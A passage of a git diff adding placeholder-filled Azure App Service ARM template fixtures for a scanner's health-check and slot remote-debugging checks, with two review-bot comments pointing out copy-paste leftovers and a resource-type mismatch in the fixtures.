"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + 
"isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass.json b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass.json new file mode 100644 index 00000000000..07d2d1367d9 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass.json 
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": true, + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + 
"supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "/somepath/", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + 
"kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": false, + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass2.json b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass2.json new file mode 100644 index 00000000000..01a5fbee61a --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/pass2.json 
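Review bot: The `allowedOrigins` entry `"is try string to app service disallow cors"` in this pass fixture is a leftover from a CORS-check fixture and has nothing to do with the health-check path being tested; pass2.json in the next hunk uses `"allowedOrigins": ["string"]`, and this file should match it. The fixture also pins `"httpsOnly": true` and `"remoteDebuggingEnabled": false` as real booleans while every other field keeps the `"bool"` placeholder, which points at the same copy source; neither value matters to a health-check check, so reverting them to placeholders leaves `"healthCheckPath": "/somepath/"` as the only meaningful value. It would also be worth a failing fixture with `"healthCheckPath": ""`, since an empty string is a plausible "not configured" shape and a check that only tests for key presence would wrongly pass it; whether the current check does so cannot be told from this hunk.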
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "pass2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "/somepath/", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail.json b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail.json new file mode 100644 index 00000000000..5a71a8d0e12 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail.json 
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + 
"supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + 
"kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": true, + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail2.json b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail2.json new file mode 100644 index 00000000000..632185adb93 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/fail2.json 
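Review bot: This fail fixture declares `"type": "Microsoft.Web/sites"` although it belongs to AppServiceSlotDebugDisabled; if that check registers only `Microsoft.Web/sites/slots`, the resource named `fail` is never evaluated and the failing-resources expectation in the test rests on fail2.json alone. Either change the type to `"Microsoft.Web/sites/slots"` as fail2.json does, or confirm that the check's supported resource types include plain sites and state that in the test. The `allowedOrigins` value `"is try string to app service disallow cors"` is the same copy-paste leftover as in the health-check fixtures and should become `"string"`.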
@@ -0,0 +1,250 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "properties": { + "clientAffinityEnabled": "bool", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", 
+ "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ "string" ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ "string" ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": 
